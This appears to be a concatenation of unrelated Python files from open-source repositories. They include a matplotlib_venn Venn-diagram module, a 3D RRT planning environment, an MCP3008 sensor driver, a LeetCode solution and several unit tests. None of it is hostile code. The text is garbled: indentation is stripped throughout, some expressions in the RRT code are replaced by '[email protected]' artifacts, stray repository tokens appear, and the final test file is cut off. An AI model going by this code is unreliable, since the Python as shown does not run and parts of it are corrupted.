from matplotlib_venn._math import *
from matplotlib_venn._common import *
from matplotlib_venn._region import VennCircleRegion
def compute_venn2_areas(diagram_areas, normalize_to=1.0):
'''
The list of venn areas is given as 3 values, corresponding to venn diagram areas in the following order:
(Ab, aB, AB) (i.e. last element corresponds to the size of intersection A&B&C).
The return value is a list of areas (A, B, AB), such that the total area is normalized
to normalize_to. If total area was 0, returns (1e-06, 1e-06, 0.0)
Assumes all input values are nonnegative (to be more precise, all areas are passed through and abs() function)
>>> compute_venn2_areas((1, 1, 0))
(0.5, 0.5, 0.0)
>>> compute_venn2_areas((0, 0, 0))
(1e-06, 1e-06, 0.0)
>>> compute_venn2_areas((1, 1, 1), normalize_to=3)
(2.0, 2.0, 1.0)
>>> compute_venn2_areas((1, 2, 3), normalize_to=6)
(4.0, 5.0, 3.0)
'''
# Normalize input values to sum to 1
areas = np.array(np.abs(diagram_areas), float)
total_area = np.sum(areas)
if np.abs(total_area) < tol:
warnings.warn("Both circles have zero area")
return (1e-06, 1e-06, 0.0)
else:
areas = areas / total_area * normalize_to
return (areas[0] + areas[2], areas[1] + areas[2], areas[2])
def solve_venn2_circles(venn_areas):
'''
Given the list of "venn areas" (as output from compute_venn2_areas, i.e. [A, B, AB]),
finds the positions and radii of the two circles.
The return value is a tuple (coords, radii), where coords is a 2x2 array of coordinates and
radii is a 2x1 array of circle radii.
Assumes the input values to be nonnegative and not all zero.
In particular, the first two values must be positive.
>>> c, r = solve_venn2_circles((1, 1, 0))
>>> np.round(r, 3).tolist()
[0.564, 0.564]
>>> c, r = solve_venn2_circles(compute_venn2_areas((1, 2, 3)))
>>> np.round(r, 3).tolist()
[0.461, 0.515]
'''
(A_a, A_b, A_ab) = list(map(float, venn_areas))
r_a, r_b = np.sqrt(A_a / np.pi), np.sqrt(A_b / np.pi)
radii = np.array([r_a, r_b])
if A_ab > tol:
# Nonzero intersection
coords = np.zeros((2, 2))
coords[1][0] = find_distance_by_area(radii[0], radii[1], A_ab)
else:
# Zero intersection
coords = np.zeros((2, 2))
coords[1][0] = radii[0] + radii[1] + max(np.mean(radii) * 1.1, 0.2) # The max here is needed for the case r_a = r_b = 0
coords = normalize_by_center_of_mass(coords, radii)
return (coords, radii)
def compute_venn2_regions(centers, radii):
'''
Returns a triple of VennRegion objects, describing the three regions of the diagram, corresponding to sets
(Ab, aB, AB)
>>> centers, radii = solve_venn2_circles((1, 1, 0.5))
>>> regions = compute_venn2_regions(centers, radii)
'''
A = VennCircleRegion(centers[0], radii[0])
B = VennCircleRegion(centers[1], radii[1])
Ab, AB = A.subtract_and_intersect_circle(B.center, B.radius)
aB, _ = B.subtract_and_intersect_circle(A.center, A.radius)
return (Ab, aB, AB)
def compute_venn2_colors(set_colors):
'''
Given two base colors, computes combinations of colors corresponding to all regions of the venn diagram.
returns a list of 3 elements, providing colors for regions (10, 01, 11).
>>> str(compute_venn2_colors(('r', 'g'))).replace(' ', '')
'(array([1.,0.,0.]),array([0.,0.5,0.]),array([0.7,0.35,0.]))'
'''
ccv = ColorConverter()
base_colors = [np.array(ccv.to_rgb(c)) for c in set_colors]
return (base_colors[0], base_colors[1], mix_colors(base_colors[0], base_colors[1]))
def compute_venn2_subsets(a, b):
'''
Given two set or Counter objects, computes the sizes of (a & ~b, b & ~a, a & b).
Returns the result as a tuple.
>>> compute_venn2_subsets(set([1,2,3,4]), set([2,3,4,5,6]))
(1, 2, 3)
>>> compute_venn2_subsets(Counter([1,2,3,4]), Counter([2,3,4,5,6]))
(1, 2, 3)
>>> compute_venn2_subsets(Counter([]), Counter([]))
(0, 0, 0)
>>> compute_venn2_subsets(set([]), set([]))
(0, 0, 0)
>>> compute_venn2_subsets(set([1]), set([]))
(1, 0, 0)
>>> compute_venn2_subsets(set([1]), set([1]))
(0, 0, 1)
>>> compute_venn2_subsets(Counter([1]), Counter([1]))
(0, 0, 1)
>>> compute_venn2_subsets(set([1,2]), set([1]))
(1, 0, 1)
>>> compute_venn2_subsets(Counter([1,1,2,2,2]), Counter([1,2,3,3]))
(3, 2, 2)
>>> compute_venn2_subsets(Counter([1,1,2]), Counter([1,2,2]))
(1, 1, 2)
>>> compute_venn2_subsets(Counter([1,1]), set([]))
Traceback (most recent call last):
...
ValueError: Both arguments must be of the same type
'''
if not (type(a) == type(b)):
raise ValueError("Both arguments must be of the same type")
set_size = len if type(a) != Counter else lambda x: sum(x.values()) # We cannot use len to compute the cardinality of a Counter
return (set_size(a - b), set_size(b - a), set_size(a & b))
def venn2_circles(subsets, normalize_to=1.0, alpha=1.0, color='black', linestyle='solid', linewidth=2.0, ax=None, **kwargs):
'''
Plots only the two circles for the corresponding Venn diagram.
Useful for debugging or enhancing the basic venn diagram.
parameters ``subsets``, ``normalize_to`` and ``ax`` are the same as in venn2()
``kwargs`` are passed as-is to matplotlib.patches.Circle.
returns a list of three Circle patches.
>>> c = venn2_circles((1, 2, 3))
>>> c = venn2_circles({'10': 1, '01': 2, '11': 3}) # Same effect
>>> c = venn2_circles([set([1,2,3,4]), set([2,3,4,5,6])]) # Also same effect
'''
if isinstance(subsets, dict):
subsets = [subsets.get(t, 0) for t in ['10', '01', '11']]
elif len(subsets) == 2:
subsets = compute_venn2_subsets(*subsets)
areas = compute_venn2_areas(subsets, normalize_to)
centers, radii = solve_venn2_circles(areas)
if ax is None:
ax = gca()
prepare_venn_axes(ax, centers, radii)
result = []
for (c, r) in zip(centers, radii):
circle = Circle(c, r, alpha=alpha, edgecolor=color, facecolor='none', linestyle=linestyle, linewidth=linewidth, **kwargs)
ax.add_patch(circle)
result.append(circle)
return result
def venn2(subsets, set_labels=('A', 'B'), set_colors=('r', 'g'), alpha=0.4, normalize_to=1.0, ax=None, subset_label_formatter=None):
'''Plots a 2-set area-weighted Venn diagram.
The subsets parameter can be one of the following:
- A list (or a tuple) containing two set objects.
- A dict, providing sizes of three diagram regions.
The regions are identified via two-letter binary codes ('10', '01', and '11'), hence a valid set could look like:
{'10': 10, '01': 20, '11': 40}. Unmentioned codes are considered to map to 0.
- A list (or a tuple) with three numbers, denoting the sizes of the regions in the following order:
(10, 01, 11)
``set_labels`` parameter is a list of two strings - set labels. Set it to None to disable set labels.
The ``set_colors`` parameter should be a list of two elements, specifying the "base colors" of the two circles.
The color of circle intersection will be computed based on those.
The ``normalize_to`` parameter specifies the total (on-axes) area of the circles to be drawn. Sometimes tuning it (together
with the overall fiture size) may be useful to fit the text labels better.
The return value is a ``VennDiagram`` object, that keeps references to the ``Text`` and ``Patch`` objects used on the plot
and lets you know the centers and radii of the circles, if you need it.
The ``ax`` parameter specifies the axes on which the plot will be drawn (None means current axes).
The ``subset_label_formatter`` parameter is a function that can be passed to format the labels
that describe the size of each subset.
>>> from matplotlib_venn import *
>>> v = venn2(subsets={'10': 1, '01': 1, '11': 1}, set_labels = ('A', 'B'))
>>> c = venn2_circles(subsets=(1, 1, 1), linestyle='dashed')
>>> v.get_patch_by_id('10').set_alpha(1.0)
>>> v.get_patch_by_id('10').set_color('white')
>>> v.get_label_by_id('10').set_text('Unknown')
>>> v.get_label_by_id('A').set_text('Set A')
You can provide sets themselves rather than subset sizes:
>>> v = venn2(subsets=[set([1,2]), set([2,3,4,5])], set_labels = ('A', 'B'))
>>> c = venn2_circles(subsets=[set([1,2]), set([2,3,4,5])], linestyle='dashed')
>>> print("%0.2f" % (v.get_circle_radius(1)/v.get_circle_radius(0)))
1.41
'''
if isinstance(subsets, dict):
subsets = [subsets.get(t, 0) for t in ['10', '01', '11']]
elif len(subsets) == 2:
subsets = compute_venn2_subsets(*subsets)
if subset_label_formatter is None:
subset_label_formatter = str
areas = compute_venn2_areas(subsets, normalize_to)
centers, radii = solve_venn2_circles(areas)
regions = compute_venn2_regions(centers, radii)
colors = compute_venn2_colors(set_colors)
if ax is None:
ax = gca()
prepare_venn_axes(ax, centers, radii)
# Create and add patches and subset labels
patches = [r.make_patch() for r in regions]
for (p, c) in zip(patches, colors):
if p is not None:
p.set_facecolor(c)
p.set_edgecolor('none')
p.set_alpha(alpha)
ax.add_patch(p)
label_positions = [r.label_position() for r in regions]
subset_labels = [ax.text(lbl[0], lbl[1], subset_label_formatter(s), va='center', ha='center') if lbl is not None else None for (lbl, s) in zip(label_positions, subsets)]
# Position set labels
if set_labels is not None:
padding = np.mean([r * 0.1 for r in radii])
label_positions = [centers[0] + np.array([0.0, - radii[0] - padding]),
centers[1] + np.array([0.0, - radii[1] - padding])]
labels = [ax.text(pos[0], pos[1], txt, size='large', ha='right', va='top') for (pos, txt) in zip(label_positions, set_labels)]
labels[1].set_ha('left')
else:
labels = None
return VennDiagram(patches, subset_labels, labels, centers, radii)
|
notebooks/bqml/track_meta.py | roannav/learntools | 359 | 32140 | # See also examples/example_track/track_meta.py for a longer, commented example
track = dict(
author_username='dansbecker',
course_name='Machine Learning',
course_url='https://www.kaggle.com/learn/intro-to-machine-learning'
)
lessons = [
dict(
topic='Your First BiqQuery ML Model',
),
]
notebooks = [
dict(
filename='tut1.ipynb',
lesson_idx=0,
type='tutorial',
scriptid=4076893,
),
dict(
filename='ex1.ipynb',
lesson_idx=0,
type='exercise',
scriptid=4077160,
),
]
|
Python/1013. PartitionArrayIntoThreePartsWithEqualSum.py | nizD/LeetCode-Solutions | 263 | 32142 | from typing import List
class Solution:
def canThreePartsEqualSum(self, A: List[int]) -> bool:
        # Since all three parts are equal, the sum of all elements of the array must be a multiple of 3,
        # so the sum of each part equals the total sum divided by 3
quotient, remainder = divmod(sum(A), 3)
if remainder != 0:
return False
subarray = 0
partitions = 0
for num in A:
subarray += num
if subarray == quotient:
partitions += 1
subarray = 0
        # Check that at least 3 partitions were found
return partitions >= 3 |
lib/data_utils/insta_utils_imgs.py | ziniuwan/maed | 145 | 32144 | import os
import sys
sys.path.append('.')
import argparse
import numpy as np
import os.path as osp
from multiprocessing import Process, Pool
from glob import glob
from tqdm import tqdm
import tensorflow as tf
from PIL import Image
from lib.core.config import INSTA_DIR, INSTA_IMG_DIR
def process_single_record(fname, outdir, split):
sess = tf.Session()
#print(fname)
record_name = fname.split('/')[-1]
for vid_idx, serialized_ex in enumerate(tf.python_io.tf_record_iterator(fname)):
#print(vid_idx)
os.makedirs(osp.join(outdir, split, record_name, str(vid_idx)), exist_ok=True)
example = tf.train.Example()
example.ParseFromString(serialized_ex)
N = int(example.features.feature['meta/N'].int64_list.value[0])
images_data = example.features.feature[
'image/encoded'].bytes_list.value
for i in range(N):
image = np.expand_dims(sess.run(tf.image.decode_jpeg(images_data[i], channels=3)), axis=0)
#video.append(image)
image = Image.fromarray(np.squeeze(image, axis=0))
image.save(osp.join(outdir, split, record_name, str(vid_idx), str(i)+".jpg"))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--inp_dir', type=str, help='tfrecords file path', default=INSTA_DIR)
parser.add_argument('--n', type=int, help='total num of workers')
parser.add_argument('--i', type=int, help='current index of worker (from 0 to n-1)')
parser.add_argument('--split', type=str, help='train or test')
parser.add_argument('--out_dir', type=str, help='output images path', default=INSTA_IMG_DIR)
args = parser.parse_args()
fpaths = glob(f'{args.inp_dir}/{args.split}/*.tfrecord')
fpaths = sorted(fpaths)
total = len(fpaths)
fpaths = fpaths[args.i*total//args.n : (args.i+1)*total//args.n]
#print(fpaths)
#print(len(fpaths))
os.makedirs(args.out_dir, exist_ok=True)
for idx, fp in enumerate(fpaths):
process_single_record(fp, args.out_dir, args.split) |
recipes/happly/all/conanfile.py | rockandsalt/conan-center-index | 562 | 32192 | from conans import ConanFile, tools
class HapplyConan(ConanFile):
name = "happly"
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/nmwsharp/happly"
topics = ("conan", "happly", "ply", "3D")
license = "MIT"
description = "A C++ header-only parser for the PLY file format. Parse .ply happily!"
settings = "compiler"
no_copy_source = True
@property
def _source_subfolder(self):
return "source_subfolder"
def validate(self):
if self.settings.compiler.cppstd:
tools.check_min_cppstd(self, 11)
def source(self):
tools.get(**self.conan_data["sources"][self.version], destination=self._source_subfolder, strip_root=True)
def package(self):
self.copy("LICENSE", src=self._source_subfolder, dst="licenses")
self.copy("happly.h", src=self._source_subfolder, dst="include")
def package_id(self):
self.info.header_only()
|
tests/integration/serialization_test.py | markowanga/stweet | 101 | 32206 | import pytest
import stweet as st
from tests.test_util import get_temp_test_file_name, get_tweets_to_tweet_output_test, \
two_lists_assert_equal
def test_csv_serialization():
csv_filename = get_temp_test_file_name('csv')
tweets_collector = st.CollectorTweetOutput()
get_tweets_to_tweet_output_test([
st.CsvTweetOutput(csv_filename),
tweets_collector
])
tweets_from_csv = st.read_tweets_from_csv_file(csv_filename)
two_lists_assert_equal(tweets_from_csv, tweets_collector.get_raw_list())
def test_file_json_lines_serialization():
jl_filename = get_temp_test_file_name('jl')
tweets_collector = st.CollectorTweetOutput()
get_tweets_to_tweet_output_test([
st.JsonLineFileTweetOutput(jl_filename),
tweets_collector
])
tweets_from_jl = st.read_tweets_from_json_lines_file(jl_filename)
two_lists_assert_equal(tweets_from_jl, tweets_collector.get_raw_list())
|
Maths_And_Stats/Number_Theory/Segmented_Sieve/segmented_sieve.py | arslantalib3/algo_ds_101 | 182 | 32208 | <gh_stars>100-1000
def segmented_sieve(n):
    # Create a boolean array with all values True
primes = [True]*n
for p in range(2,n):
        # If primes[p] is True, p is prime and its multiples are not prime
if primes[p]:
for i in range(2*p,n,p):
# Mark every multiple of a prime as not prime
primes[i]=False
    # If primes[l] is still True, l is prime, so print it
for l in range(2,n):
if primes[l]:
print(f"{l} ")
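# Illustrative example: segmented_sieve(10) prints the primes below 10, i.e. 2 3 5 7.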
#Test
while True:
try:
        input_value = int(input("Please enter a number: "))
segmented_sieve(input_value)
break
except ValueError:
        print("Not a valid integer! Please try again ...")
third_party/blink/renderer/bindings/scripts/blink_idl_parser_test.py | zealoussnow/chromium | 14,668 | 32213 | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=no-member,relative-import
"""Unit tests for blink_idl_parser.py."""
import unittest
from blink_idl_parser import BlinkIDLParser
class BlinkIDLParserTest(unittest.TestCase):
def test_missing_semicolon_between_definitions(self):
# No semicolon after enum definition.
text = '''enum TestEnum { "value" } dictionary TestDictionary {};'''
parser = BlinkIDLParser()
parser.ParseText(filename='', data=text)
self.assertGreater(parser.GetErrors(), 0)
|
sarikasama/0012/0012.py | saurabh896/python-1 | 3,976 | 32229 | #!/usr/bin/env python3
#filter sensitive words in user's input
def replace_sensitive_words(input_word):
s_words = []
with open('filtered_words','r') as f:
line = f.readline()
while line != '':
s_words.append(line.strip())
line = f.readline()
for word in s_words:
if word in input_word:
input_word = input_word.replace(word, "**")
print(input_word)
if __name__ == '__main__':
while True:
input_word = input('--> ')
replace_sensitive_words(input_word)
|
tests/r/test_bcdeter.py | hajime9652/observations | 199 | 32245 | <reponame>hajime9652/observations
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.bcdeter import bcdeter
def test_bcdeter():
"""Test module bcdeter.py by downloading
bcdeter.csv and testing shape of
extracted data has 95 rows and 3 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = bcdeter(test_path)
try:
assert x_train.shape == (95, 3)
except:
shutil.rmtree(test_path)
    raise
|
Sampling_based_Planning/rrt_3D/env3D.py | CodesHub/PathPlanning | 3,693 | 32258 | <filename>Sampling_based_Planning/rrt_3D/env3D.py
# this is the three dimensional configuration space for rrt
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: <NAME>
"""
import numpy as np
# from utils3D import OBB2AABB
def R_matrix(z_angle,y_angle,x_angle):
    # x angle: roll; y angle: pitch; z angle: yaw
# generate rotation matrix in SO3
# RzRyRx = R, ZYX intrinsic rotation
# also (r1,r2,r3) in R3*3 in {W} frame
# used in obb.O
# [[R p]
# [0T 1]] gives transformation from body to world
return np.array([[np.cos(z_angle), -np.sin(z_angle), 0.0], [np.sin(z_angle), np.cos(z_angle), 0.0], [0.0, 0.0, 1.0]])@ \
np.array([[np.cos(y_angle), 0.0, np.sin(y_angle)], [0.0, 1.0, 0.0], [-np.sin(y_angle), 0.0, np.cos(y_angle)]])@ \
np.array([[1.0, 0.0, 0.0], [0.0, np.cos(x_angle), -np.sin(x_angle)], [0.0, np.sin(x_angle), np.cos(x_angle)]])
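# Quick sanity check (illustrative addition, not used elsewhere in this module):
# a matrix returned by R_matrix should be orthogonal with determinant 1. The
# angles are assumed to be in radians, which is what numpy's cos/sin expect.
def _R_matrix_sanity_example():
    R = R_matrix(np.pi/2, 0.0, 0.0)  # pure 90 degree yaw about the z axis
    assert np.allclose(R @ R.T, np.eye(3))      # orthogonality
    assert np.isclose(np.linalg.det(R), 1.0)    # proper rotation, no reflection
    # rotating the x axis by 90 degrees about z yields the y axis
    assert np.allclose(R @ np.array([1.0, 0.0, 0.0]), [0.0, 1.0, 0.0])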
def getblocks():
# AABBs
block = [[4.00e+00, 1.20e+01, 0.00e+00, 5.00e+00, 2.00e+01, 5.00e+00],
[5.5e+00, 1.20e+01, 0.00e+00, 1.00e+01, 1.30e+01, 5.00e+00],
[1.00e+01, 1.20e+01, 0.00e+00, 1.40e+01, 1.30e+01, 5.00e+00],
[1.00e+01, 9.00e+00, 0.00e+00, 2.00e+01, 1.00e+01, 5.00e+00],
[9.00e+00, 6.00e+00, 0.00e+00, 1.00e+01, 1.00e+01, 5.00e+00]]
Obstacles = []
for i in block:
i = np.array(i)
Obstacles.append([j for j in i])
return np.array(Obstacles)
def getballs():
spheres = [[2.0,6.0,2.5,1.0],[14.0,14.0,2.5,2]]
Obstacles = []
for i in spheres:
Obstacles.append([j for j in i])
return np.array(Obstacles)
def getAABB(blocks):
# used for Pyrr package for detecting collision
AABB = []
for i in blocks:
        AABB.append(np.array([np.add(i[0:3], -0), np.add(i[3:6], 0)])) # make the AABBs a little bit larger
return AABB
def getAABB2(blocks):
# used in lineAABB
AABB = []
for i in blocks:
AABB.append(aabb(i))
return AABB
def add_block(block = [1.51e+01, 0.00e+00, 2.10e+00, 1.59e+01, 5.00e+00, 6.00e+00]):
return block
class aabb(object):
# make AABB out of blocks,
# P: center point
# E: extents
# O: Rotation matrix in SO(3), in {w}
def __init__(self,AABB):
self.P = [(AABB[3] + AABB[0])/2, (AABB[4] + AABB[1])/2, (AABB[5] + AABB[2])/2]# center point
self.E = [(AABB[3] - AABB[0])/2, (AABB[4] - AABB[1])/2, (AABB[5] - AABB[2])/2]# extents
self.O = [[1,0,0],[0,1,0],[0,0,1]]
class obb(object):
# P: center point
# E: extents
# O: Rotation matrix in SO(3), in {w}
def __init__(self, P, E, O):
self.P = P
self.E = E
self.O = O
self.T = np.vstack([np.column_stack([self.O.T,[email protected]]),[0,0,0,1]])
class env():
def __init__(self, xmin=0, ymin=0, zmin=0, xmax=20, ymax=20, zmax=5, resolution=1):
# def __init__(self, xmin=-5, ymin=0, zmin=-5, xmax=10, ymax=5, zmax=10, resolution=1):
self.resolution = resolution
self.boundary = np.array([xmin, ymin, zmin, xmax, ymax, zmax])
self.blocks = getblocks()
self.AABB = getAABB2(self.blocks)
self.AABB_pyrr = getAABB(self.blocks)
self.balls = getballs()
self.OBB = np.array([obb([5.0,7.0,2.5],[0.5,2.0,2.5],R_matrix(135,0,0)),
obb([12.0,4.0,2.5],[0.5,2.0,2.5],R_matrix(45,0,0))])
self.start = np.array([2.0, 2.0, 2.0])
self.goal = np.array([6.0, 16.0, 0.0])
self.t = 0 # time
def New_block(self):
newblock = add_block()
self.blocks = np.vstack([self.blocks,newblock])
self.AABB = getAABB2(self.blocks)
self.AABB_pyrr = getAABB(self.blocks)
def move_start(self, x):
self.start = x
def move_block(self, a = [0,0,0], s = 0, v = [0.1,0,0], block_to_move = 0, mode = 'translation'):
        # t is time, v is velocity in R3, a is acceleration in R3, s is the increment in time,
        # R is an orthogonal transform in R3*3, i.e. the rotation matrix
        # (s',t') = (s + tv, t) is a uniform transformation
        # (s',t') = (s + a, t + s) is a translation
if mode == 'translation':
ori = np.array(self.blocks[block_to_move])
self.blocks[block_to_move] = \
np.array([ori[0] + a[0],\
ori[1] + a[1],\
ori[2] + a[2],\
ori[3] + a[0],\
ori[4] + a[1],\
ori[5] + a[2]])
self.AABB[block_to_move].P = \
[self.AABB[block_to_move].P[0] + a[0], \
self.AABB[block_to_move].P[1] + a[1], \
self.AABB[block_to_move].P[2] + a[2]]
self.t += s
        # return the range of space that the block may have moved through
a = self.blocks[block_to_move]
return np.array([a[0] - self.resolution, a[1] - self.resolution, a[2] - self.resolution, \
a[3] + self.resolution, a[4] + self.resolution, a[5] + self.resolution]), \
np.array([ori[0] - self.resolution, ori[1] - self.resolution, ori[2] - self.resolution, \
ori[3] + self.resolution, ori[4] + self.resolution, ori[5] + self.resolution])
# return a,ori
# (s',t') = (Rx, t)
def move_OBB(self, obb_to_move = 0, theta=[0,0,0], translation=[0,0,0]):
        # theta stands for the rotational angles around the three principal axes in the world frame
        # translation stands for the translation in the world frame
ori = [self.OBB[obb_to_move]]
# move obb position
self.OBB[obb_to_move].P = \
[self.OBB[obb_to_move].P[0] + translation[0],
self.OBB[obb_to_move].P[1] + translation[1],
self.OBB[obb_to_move].P[2] + translation[2]]
# Calculate orientation
self.OBB[obb_to_move].O = R_matrix(z_angle=theta[0],y_angle=theta[1],x_angle=theta[2])
# generating transformation matrix
self.OBB[obb_to_move].T = np.vstack([np.column_stack([self.OBB[obb_to_move].O.T,\
-self.OBB[obb_to_move][email protected][obb_to_move].P]),[translation[0],translation[1],translation[2],1]])
return self.OBB[obb_to_move], ori[0]
if __name__ == '__main__':
newenv = env()
|
mqtt_io/modules/sensor/mcp3008.py | DominicWindisch/mqtt-io | 231 | 32261 | <reponame>DominicWindisch/mqtt-io<filename>mqtt_io/modules/sensor/mcp3008.py
"""
MCP3008 analog to digital converter
"""
import logging
from typing import cast
from mqtt_io.types import ConfigType, SensorValueType
from . import GenericSensor
REQUIREMENTS = ("adafruit-mcp3008",)
CONFIG_SCHEMA = {
"spi_port": dict(type="integer", required=False, empty=False, default=0),
"spi_device": dict(type="integer", required=False, empty=False, default=0),
"chip_addr": dict(type="integer", required=False, empty=False, default=0),
}
_LOG = logging.getLogger(__name__)
class Sensor(GenericSensor):
"""
Implementation of MCP3008 ADC sensor.
"""
SENSOR_SCHEMA = {
"channel": dict(
type="integer",
required=True,
min=0,
max=7,
)
}
def setup_module(self) -> None:
"""
        Initialize the MCP3008 on the configured SPI port and device
"""
# pylint: disable=import-outside-toplevel,import-error
import Adafruit_GPIO.SPI as SPI # type: ignore
import Adafruit_MCP3008 # type: ignore
self.mcp = Adafruit_MCP3008.MCP3008(
spi=SPI.SpiDev(self.config["spi_port"], self.config["spi_device"])
)
def get_value(self, sens_conf: ConfigType) -> SensorValueType:
"""
Get the analog value from the adc for the configured channel
"""
# Returns an integer from 0-1023
return cast(int, self.mcp.read_adc(sens_conf["channel"]))
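# Illustrative configuration sketch (assumption, not part of this module): a
# minimal mqtt-io style YAML fragment wiring channel 0 of this sensor. Only the
# spi_port/spi_device/chip_addr and channel keys come from the schemas above;
# the surrounding section names are assumed.
#
# sensor_modules:
#   - name: mcp3008
#     module: mcp3008
#     spi_port: 0
#     spi_device: 0
#
# sensor_inputs:
#   - name: adc0
#     module: mcp3008
#     channel: 0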
|
tests/test_scriptfields.py | ttimasdf/pyes | 175 | 32283 | <filename>tests/test_scriptfields.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import unittest
from pyes import scriptfields
class ScriptFieldsTest(unittest.TestCase):
def test_scriptfieldserror_imported(self):
self.assertTrue(hasattr(scriptfields, 'ScriptFieldsError'))
def test_ignore_failure(self):
fields = scriptfields.ScriptFields("a_field", "return _source.field", ignore_failure=True)
serialized = fields.serialize()
self.assertIn("ignore_failure", serialized.get("a_field", {}))
if __name__ == '__main__':
unittest.main()
|
arviz/plots/backends/matplotlib/distcomparisonplot.py | sudojarvis/arviz | 1,159 | 32296 | <filename>arviz/plots/backends/matplotlib/distcomparisonplot.py
"""Matplotlib Density Comparison plot."""
import matplotlib.pyplot as plt
import numpy as np
from ...distplot import plot_dist
from ...plot_utils import _scale_fig_size
from . import backend_kwarg_defaults, backend_show
def plot_dist_comparison(
ax,
nvars,
ngroups,
figsize,
dc_plotters,
legend,
groups,
textsize,
labeller,
prior_kwargs,
posterior_kwargs,
observed_kwargs,
backend_kwargs,
show,
):
"""Matplotlib Density Comparison plot."""
if backend_kwargs is None:
backend_kwargs = {}
backend_kwargs = {
**backend_kwarg_defaults(),
**backend_kwargs,
}
if prior_kwargs is None:
prior_kwargs = {}
if posterior_kwargs is None:
posterior_kwargs = {}
if observed_kwargs is None:
observed_kwargs = {}
if backend_kwargs is None:
backend_kwargs = {}
(figsize, _, _, _, linewidth, _) = _scale_fig_size(figsize, textsize, 2 * nvars, ngroups)
backend_kwargs.setdefault("figsize", figsize)
posterior_kwargs.setdefault("plot_kwargs", {})
posterior_kwargs["plot_kwargs"]["color"] = posterior_kwargs["plot_kwargs"].get("color", "C0")
posterior_kwargs["plot_kwargs"].setdefault("linewidth", linewidth)
posterior_kwargs.setdefault("hist_kwargs", {})
posterior_kwargs["hist_kwargs"].setdefault("alpha", 0.5)
prior_kwargs.setdefault("plot_kwargs", {})
prior_kwargs["plot_kwargs"]["color"] = prior_kwargs["plot_kwargs"].get("color", "C1")
prior_kwargs["plot_kwargs"].setdefault("linewidth", linewidth)
prior_kwargs.setdefault("hist_kwargs", {})
prior_kwargs["hist_kwargs"].setdefault("alpha", 0.5)
observed_kwargs.setdefault("plot_kwargs", {})
observed_kwargs["plot_kwargs"]["color"] = observed_kwargs["plot_kwargs"].get("color", "C2")
observed_kwargs["plot_kwargs"].setdefault("linewidth", linewidth)
observed_kwargs.setdefault("hist_kwargs", {})
observed_kwargs["hist_kwargs"].setdefault("alpha", 0.5)
if ax is None:
axes = np.empty((nvars, ngroups + 1), dtype=object)
fig = plt.figure(**backend_kwargs)
gs = fig.add_gridspec(ncols=ngroups, nrows=nvars * 2)
for i in range(nvars):
for j in range(ngroups):
axes[i, j] = fig.add_subplot(gs[2 * i, j])
axes[i, -1] = fig.add_subplot(gs[2 * i + 1, :])
else:
axes = ax
if ax.shape != (nvars, ngroups + 1):
raise ValueError(
"Found {} shape of axes, which is not equal to data shape {}.".format(
axes.shape, (nvars, ngroups + 1)
)
)
for idx, plotter in enumerate(dc_plotters):
group = groups[idx]
kwargs = (
prior_kwargs
if group.startswith("prior")
else posterior_kwargs
if group.startswith("posterior")
else observed_kwargs
)
for idx2, (
var_name,
sel,
isel,
data,
) in enumerate(plotter):
label = f"{group}"
plot_dist(
data,
label=label if legend else None,
ax=axes[idx2, idx],
**kwargs,
)
plot_dist(
data,
label=label if legend else None,
ax=axes[idx2, -1],
**kwargs,
)
if idx == 0:
axes[idx2, -1].set_xlabel(labeller.make_label_vert(var_name, sel, isel))
if backend_show(show):
plt.show()
return axes
|
tests/r/test_us_pop.py | hajime9652/observations | 199 | 32343 | <gh_stars>100-1000
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.us_pop import us_pop
def test_us_pop():
"""Test module us_pop.py by downloading
us_pop.csv and testing shape of
extracted data has 22 rows and 2 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = us_pop(test_path)
try:
assert x_train.shape == (22, 2)
except:
shutil.rmtree(test_path)
    raise
|
run.py | radish2012/flask-restful-example | 650 | 32370 | from app.factory import create_app, celery_app
app = create_app(config_name="DEVELOPMENT")
app.app_context().push()
if __name__ == "__main__":
app.run()
|
tests/unicode/unicode_id.py | learnforpractice/micropython-cpp | 692 | 32394 | <filename>tests/unicode/unicode_id.py
# test unicode in identifiers
# comment
# αβγδϵφζ
# global identifiers
α = 1
αβγ = 2
bβ = 3
βb = 4
print(α, αβγ, bβ, βb)
# function, argument, local identifiers
def α(β, γ):
δ = β + γ
print(β, γ, δ)
α(1, 2)
# class, method identifiers
class φ:
def __init__(self):
pass
def δ(self, ϵ):
print(ϵ)
zζzζz = φ()
if hasattr(zζzζz, "δ"):
zζzζz.δ(ϵ=123)
|
samples/histrequester_demo.py | suuuch/tws_async | 102 | 32397 | import datetime
import pytz
from tws_async import *
stocks = [
Stock('TSLA'),
Stock('AAPL'),
Stock('GOOG'),
Stock('INTC', primaryExchange='NASDAQ')
]
forexs = [
Forex('EURUSD'),
Forex('GBPUSD'),
Forex('USDJPY')
]
endDate = datetime.date.today()
startDate = endDate - datetime.timedelta(days=7)
histReqs = []
for date in util.dateRange(startDate, endDate):
histReqs += [HistRequest(stock, date) for stock in stocks]
histReqs += [HistRequest(forex, date, whatToShow='MIDPOINT',
durationStr='30 D', barSizeSetting='1 day') for forex in forexs]
timezone = datetime.timezone.utc
# timezone = pytz.timezone('Europe/Amsterdam')
# timezone = pytz.timezone('US/Eastern')
util.logToConsole()
tws = HistRequester()
tws.connect('127.0.0.1', 7497, clientId=1)
task = tws.download(histReqs, rootDir='data', timezone=timezone)
tws.run(task)
|
Tests/ttLib/tables/C_F_F__2_test.py | odidev/fonttools | 2,705 | 32399 | """cff2Lib_test.py -- unit test for Adobe CFF fonts."""
from fontTools.ttLib import TTFont
from io import StringIO
import re
import os
import unittest
CURR_DIR = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
DATA_DIR = os.path.join(CURR_DIR, 'data')
CFF_TTX = os.path.join(DATA_DIR, "C_F_F__2.ttx")
CFF_BIN = os.path.join(DATA_DIR, "C_F_F__2.bin")
def strip_VariableItems(string):
# ttlib changes with the fontTools version
string = re.sub(' ttLibVersion=".*"', '', string)
# head table checksum and mod date changes with each save.
